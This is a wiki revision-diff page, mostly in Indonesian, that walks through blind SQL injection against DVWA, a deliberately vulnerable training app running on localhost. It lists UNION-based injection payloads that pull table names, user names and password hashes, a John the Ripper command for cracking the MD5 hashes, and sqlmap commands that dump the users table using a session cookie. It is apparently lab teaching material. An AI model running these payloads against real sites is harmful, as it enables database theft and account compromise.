DVWA: SQLi blind: Difference between revisions

From OnnoCenterWiki
Jump to navigationJump to search
← Older edit
Onnowpurbo (talk | contribs)
69,477 edits
Onnowpurbo (talk | contribs)
69,477 edits
No edit summary
Onnowpurbo (talk | contribs)
69,477 edits
No edit summary
 
(3 intermediate revisions by the same user not shown)
Line 1: Line 1:
DVWA-BLIND SQL INJECTION : LOW Level
DVWA-BLIND SQL INJECTION : LOW Level


1. Open Local host  http://localhost/dvwa
* Buka DVWA, misalnya http://localhost/DVWA-1.9


  Username :  Admin
  Username :  Admin
  Password : Password
  Password : Password


3.Select SQL Injection BLIND and  column ID issued
* Pilih SQL Injection BLIND dan dalam kolom ID masukan


  1' and 1=1#
  1' and 1=1#
  1' and 1=1 order by 2 #
  1' and 1=1 order by 2 #
ID: 'or' 1=1--


5.ID: 'or' 1=1--
Kita akan lihat ada 5 user


we can see there are 5 user
* Melihat informasi table
 
5. now see information table


  1' and 1=0 union select null,table_name from information_schema.tables#
  1' and 1=0 union select null,table_name from information_schema.tables#
  1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'' #
  1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'' #


7. Information table name from table user
* Melihat informasi table name dari table user


  1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'' #
  1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'' #


8. on the last lets see  user name and password
* Terakhir lihat username dan password


  1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
  1' and 1=0 union select null,concat(first_name,0x0a,password) from users #


9. we will crack the md5 password
* Crack md5 password
 
copy the passowrd into kwrite and save with name hash
next
 


  root@bt:/pentest/passwords/john#./john --format=raw-md5 hash  
  copy hasil password hash yang diperoleh, save misalnya dengan nama hash


Lakukan


OK GOOD LUCK
  root@bt:/pentest/passwords/john#./john --format=raw-md5 hash


Ok next lesson .. I will explain How to Exploit DVWA using Sqlmap.


1. afer login in DVWA and choose DVWA Securty Low
==Exploit DVWA menggunakan SQLmap==
2. follow this picture


In User ID write '1
* Login ke DVWA
* Pilih DVWA Security Low
* Pada user ID tulis '1
* Jalankan addon tamer di browser
* Lakukan di terminal,


than show
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
 
Lakukan di terminal,
 
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns


  --> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
  --> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
Line 57: Line 50:
di peroleh dari addon tamer di browser.
di peroleh dari addon tamer di browser.


lihat tables
* lihat tables
 
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
 
lihat kolom di user tabel


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
* lihat kolom di user tabel
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns


lihat field password & dump
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
* lihat field password & dump
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump


==Referensi==
==Referensi==


* http://scxo1oc06c.blogspot.co.id/2012/02/dvwa-blind-sql-injection-low-level.html
* http://scxo1oc06c.blogspot.co.id/2012/02/dvwa-blind-sql-injection-low-level.html

Latest revision as of 00:51, 4 March 2017

DVWA-BLIND SQL INJECTION : LOW Level 

Username :  Admin
Password : Password
  • Pilih SQL Injection BLIND dan dalam kolom ID masukan
1' and 1=1#
1' and 1=1 order by 2 #
ID: 'or' 1=1--

Kita akan lihat ada 5 user

  • Melihat informasi table
1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users #
  • Melihat informasi table name dari table user
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users #
  • Terakhir lihat username dan password
1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
  • Crack md5 password
copy hasil password hash yang diperoleh, save misalnya dengan nama hash

Lakukan 

 root@bt:/pentest/passwords/john#./john --format=raw-md5 hash


Exploit DVWA menggunakan SQLmap

  • Login ke DVWA
  • Pilih DVWA Security Low
  • Pada user ID tulis '1
  • Jalankan addon tamer di browser
  • Lakukan di terminal,
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="

di peroleh dari addon tamer di browser.

  • lihat tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
  • lihat kolom di user tabel
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
  • lihat field password & dump
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump

Referensi

Retrieved from "https://lms.onnocenter.or.id/wiki/index.php?title=DVWA:_SQLi_blind&oldid=47179"